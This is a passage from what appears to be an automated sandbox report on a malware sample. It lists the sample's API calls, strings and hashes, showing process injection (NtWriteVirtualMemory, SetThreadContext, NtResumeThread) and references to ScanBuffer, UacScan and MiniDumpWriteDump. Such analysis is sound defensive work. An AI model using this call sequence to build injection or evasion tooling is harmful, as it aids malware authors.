                        • Part of subcall function 028A7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      • SetThreadContext.KERNEL32(00000000,028F2420,ScanBuffer,028F23A4,028AA774,ScanString,028F23A4,028AA774,Initialize,028F23A4,028AA774,00000000,-00000008,028F24F8,00000004,028F24FC), ref: 028AA14F
                      • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,028F2420,ScanBuffer,028F23A4,028AA774,ScanString,028F23A4,028AA774,Initialize,028F23A4,028AA774,00000000,-00000008,028F24F8), ref: 028AA15C
                        • Part of subcall function 028A8798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize,028F23A4,028AA774,UacScan), ref: 028A87AC
                        • Part of subcall function 028A8798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028A87C6
                        • Part of subcall function 028A8798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize), ref: 028A8802
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Library$Thread$AddressContextFreeLoadProc$HandleMemoryModuleResumeVirtualWrite
                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                      • API String ID: 4175202198-51457883
                      • Opcode ID: d858d7f595146f77330bc4532d68a6fcb6379d86e3635bd50033f73fd803110b
                      • Instruction ID: 609a725b305e24184948a6c084cc7034bb4d6db85b35dde8ab0a0e3c5e9fe723
                      • Opcode Fuzzy Hash: d858d7f595146f77330bc4532d68a6fcb6379d86e3635bd50033f73fd803110b
                      • Instruction Fuzzy Hash: 4CE24C7DA501289FEF15EB68CCA0BDE73BAAF84300F1481A1E145EB615DE749E46CF12
                      Function 028A8BA6 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1605threadCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 028A881C: LoadLibraryA.KERNEL32(00000000,00000000,028A8903), ref: 028A8850
                        • Part of subcall function 028A881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,028A8903), ref: 028A8860
                        • Part of subcall function 028A881C: GetProcAddress.KERNEL32(74F60000,00000000), ref: 028A8879
                        • Part of subcall function 028A881C: FreeLibrary.KERNEL32(74F60000,00000000,028F2388,Function_000065D8,00000004,028F2398,028F2388,000186A3,00000040,028F239C,74F60000,00000000,00000000,00000000,00000000,028A8903), ref: 028A88E3
                      • GetThreadContext.KERNEL32(00000000,028F2420,ScanString,028F23A4,028AA774,UacInitialize,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,UacInitialize,028F23A4), ref: 028A943A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Library$AddressContextFreeHandleLoadModuleProcThread
                      • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                      • API String ID: 1116111917-51457883
                      • Opcode ID: d507fd6243955d7505aba5c86e89ac3789d000c4b421a4d4543d515b59a7f1ba
                      • Instruction ID: 1098648eb3a70d297d2217a31c0d8ee425fa4f8526ca3c60190d78338ebb964f
                      • Opcode Fuzzy Hash: d507fd6243955d7505aba5c86e89ac3789d000c4b421a4d4543d515b59a7f1ba
                      • Instruction Fuzzy Hash: C9E23C7DA501289FEF15EB68CCA0BDE73BAAF84300F1481A1E145EB615DE749E46CF12
                      Function 028958B4 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleA.KERNEL32(kernel32.dll,02896BC8,02890000,028BE790), ref: 028958D1
                      • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028958E8
                      • lstrcpynA.KERNEL32(?,?,?), ref: 02895918
                      • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 0289597C
                      • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 028959B2
                      • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 028959C5
                      • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 028959D7
                      • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000,028BE790), ref: 028959E3
                      • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8,02890000), ref: 02895A17
                      • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02896BC8), ref: 02895A23
                      • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02895A45
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                      • String ID: GetLongPathNameA$\$kernel32.dll
                      • API String ID: 3245196872-1565342463
                      • Opcode ID: 19d20a35a1cdcd927f70bf135d4261e21bd06e844f5c906a9b54030c2f523273
                      • Instruction ID: d4e3a19cf2ab7ce158e2fe9f0d6d464dcffddaa044e08a5a7bc93f2bc36450c9
                      • Opcode Fuzzy Hash: 19d20a35a1cdcd927f70bf135d4261e21bd06e844f5c906a9b54030c2f523273
                      • Instruction Fuzzy Hash: 55416D79E04259AFDF11DFE8CC88ADEB3FEAB08304F4845A5A148E7241D7349A448F54
                      Function 02895B84 Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                      Download Yara Rule
                      APIs
                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02895B94
                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02895BA1
                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02895BA7
                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02895BD2
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02895C19
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02895C29
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02895C51
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02895C61
                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02895C87
                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02895C97
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                      • API String ID: 1599918012-2375825460
                      • Opcode ID: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                      • Instruction ID: 86224bca5790768c5ac74e01a15fc0c204d72f4ed05ffb645284c717bda3be1a
                      • Opcode Fuzzy Hash: 872c564c5497cc255b6ddda9ad26ad67b225e16f2838cfcbc1086dd5fd5d1ed0
                      • Instruction Fuzzy Hash: 7031957DE4421D7AFF26D6F88C49BDFB7AD4B04384F4801E19608E6181DB789A44CF91
                      Function 028A8798 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize,028F23A4,028AA774,UacScan), ref: 028A87AC
                      • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028A87C6
                      • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,028F23A4,028AA3BF,ScanString,028F23A4,028AA774,ScanBuffer,028F23A4,028AA774,Initialize), ref: 028A8802
                        • Part of subcall function 028A7CF8: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 028A7D6C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                      • String ID: BCryptVerifySignature$bcrypt
                      • API String ID: 1002360270-4067648912
                      • Opcode ID: 092640ed654a9e26dee3d0d21a8634ca3d28b358c88f4fafb8314d5f95951051
                      • Instruction ID: 2155d518694854a43b0bbaec5deee99b38bdfec0155dd8638846a0b4ea8eb471
                      • Opcode Fuzzy Hash: 092640ed654a9e26dee3d0d21a8634ca3d28b358c88f4fafb8314d5f95951051
                      • Instruction Fuzzy Hash: 2AF0C8FDA813245FF390AA6DA844F56379EB782355F0C0929BB08C71E4DBB44810CB60
                      Function 028ADF00 Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 02894ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02894EDA
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADFD2), ref: 028ADF3F
                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 028ADF79
                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 028ADFA6
                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 028ADFAF
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                      • String ID:
                      • API String ID: 3764614163-0
                      • Opcode ID: e3000710de381aa197112f6083038af177038cc5ec60b72128e8fe5941d47482
                      • Instruction ID: a4e5d421b4cd28a2ee525156749818ffc178a2261579642c30fe1291d0759fb9
                      • Opcode Fuzzy Hash: e3000710de381aa197112f6083038af177038cc5ec60b72128e8fe5941d47482
                      • Instruction Fuzzy Hash: C421ED79A40308BAFB10EAE4CC52F9EB7BDAB04B04F544061B600F75D0DBB4AE058A66
                      Function 028ADE24 Relevance: 4.5, APIs: 3, Instructions: 47filenativeCOMMON
                      Download Yara Rule
                      APIs
                      • RtlInitUnicodeString.NTDLL(?,?), ref: 028ADEA0
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADEF2), ref: 028ADEB6
                      • NtDeleteFile.NTDLL(?), ref: 028ADED5
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Path$DeleteFileInitNameName_StringUnicode
                      • String ID:
                      • API String ID: 1459852867-0
                      • Opcode ID: 04bcbcdbf97a37c569b4dc7d71b775fc47ae6acb87d6c073bc15c153bbad84ce
                      • Instruction ID: f9043de021f4a34bb4421796fa30e84f945c5ccf2b011e17e640d533ad1f1aa4
                      • Opcode Fuzzy Hash: 04bcbcdbf97a37c569b4dc7d71b775fc47ae6acb87d6c073bc15c153bbad84ce
                      • Instruction Fuzzy Hash: BC01867EA453486EFB05E7E4CDA1BCDB7BDAB54B04F5000E29200E6492DF746B19CB22
                      Function 028ADE78 Relevance: 4.5, APIs: 3, Instructions: 45filenativeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 02894ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02894EDA
                      • RtlInitUnicodeString.NTDLL(?,?), ref: 028ADEA0
                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,028ADEF2), ref: 028ADEB6
                      • NtDeleteFile.NTDLL(?), ref: 028ADED5
                        • Part of subcall function 02894C0C: SysFreeString.OLEAUT32(028AED84), ref: 02894C1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: String$Path$AllocDeleteFileFreeInitNameName_Unicode
                      • String ID:
                      • API String ID: 1694942484-0
                      • Opcode ID: 65dfcebf0f218996466e1b20f823dc84b7fdbc7278a39f8c141c1e949c7e8b17
                      • Instruction ID: b5535dc2f0a5ea412858f62bc5088d34081c26bb7d6ef8f93d9438efe2473ac3
                      • Opcode Fuzzy Hash: 65dfcebf0f218996466e1b20f823dc84b7fdbc7278a39f8c141c1e949c7e8b17
                      • Instruction Fuzzy Hash: E901F47D940248BAEB11EBE4CD61FDEB3BDEB58700F5044B1A601E2580EF756B148A65
                      Function 02897F52 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                      Download Yara Rule
                      APIs
                      • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02897F75
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: DiskFreeSpace
                      • String ID:
                      • API String ID: 1705453755-0
                      • Opcode ID: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                      • Instruction ID: a2bfd6feb6bb550ac774bae51f8af12296f29db3ba7000db5eb99d9cc9dd0456
                      • Opcode Fuzzy Hash: af95a7847bce4aac7ce6c5ec9bc2f4eb7d8060860abe66f176e19b8d00619888
                      • Instruction Fuzzy Hash: 581100B5A00209AF9B04CF9DC8809AFF7F9EFC8304B14C569A508EB254E6319A018B90
                      Function 0289A744 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                      Download Yara Rule
                      APIs
                      • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0289A762
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                      • Instruction ID: d814ab3b97626573e48520275640cd9615ddd9f0fabb139ec4b24c2caa278e08
                      • Opcode Fuzzy Hash: 91039f575b2d446255c84316eb4a3d27fa0998d30cefffcfb9a5ad718a7383d1
                      • Instruction Fuzzy Hash: 16E0D83D70021827DB15A5AC9C819F6735D975C310F04417EBD49C7341FDA19D404EE5
                      Function 0289B70C Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                      Download Yara Rule
                      APIs
                      • GetVersionExA.KERNEL32(?,028BD106,00000000,028BD11E), ref: 0289B71A
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: Version
                      • String ID:
                      • API String ID: 1889659487-0
                      • Opcode ID: 3d6040078e2d3b2e26761f854c4311bb14854f4f32b5198d6e945d1973107ae5
                      • Instruction ID: 0fd25192b939acda6ef8ccf7cc6fee2a8089c1af5b63d08140b1e1e6bd274b04
                      • Opcode Fuzzy Hash: 3d6040078e2d3b2e26761f854c4311bb14854f4f32b5198d6e945d1973107ae5
                      • Instruction Fuzzy Hash: A6F0177C904305AFD751DF28E540A5577E9FB48B04F848D2CE699C7780E7399418CF5A
                      Function 0289A790 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                      Download Yara Rule
                      APIs
                      • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0289BDF2,00000000,0289C00B,?,?,00000000,00000000), ref: 0289A7A3
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: InfoLocale
                      • String ID:
                      • API String ID: 2299586839-0
                      • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                      • Instruction ID: 37f70dd436098941240fcf38343711eea672bb4dc605a16aeb3876cc9542d687
                      • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                      • Instruction Fuzzy Hash: EDD05EBE30E2603AA624915A2D85D7B5AFCCAC57A1F08403EF588C6201D2008C0596F1
                      Function 0289918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID: LocalTime
                      • String ID:
                      • API String ID: 481472006-0
                      • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                      • Instruction ID: 2989e7c8566a69bd7abd289a05a11fa1c55da388cb09da66b9dbc5021717cc83
                      • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                      • Instruction Fuzzy Hash: 23A01128808830028A803B2C0C0223A3088A800A20FC80F80A8F8802E2FE2E022080E3
                      Function 028BE596 Relevance: .2, Instructions: 230COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446832196.00000000028BE000.00000004.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
                      • Associated: 00000000.00000002.3446769259.0000000002890000.00000002.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446887020.00000000028F2000.00000040.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E7000.00000004.00001000.00020000.00000000.sdmpDownload File
                      • Associated: 00000000.00000002.3446922910.00000000029E9000.00000004.00001000.00020000.00000000.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2890000_UAHIzSm2x2.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 007f7118ed148b327ae0518c11a45bc40620c11e986c5062092c6bdf67fe7d0f
                      • Instruction ID: f7d47b1fce763081f3145c2debae8fa2a3df3d393fe6ba46a6a680f27ebde7e7
                      • Opcode Fuzzy Hash: 007f7118ed148b327ae0518c11a45bc40620c11e986c5062092c6bdf67fe7d0f
                      • Instruction Fuzzy Hash: F751E6790592C28FC7438F7884A86D17FF1AE1B62434906DAC8D4CF263E3696897DB11
                      Function 028920C4 Relevance: .1, Instructions: 94COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.3446785369.0000000002891000.00000020.00001000.00020000.00000000.sdmp, Offset: 02890000, based on PE: true
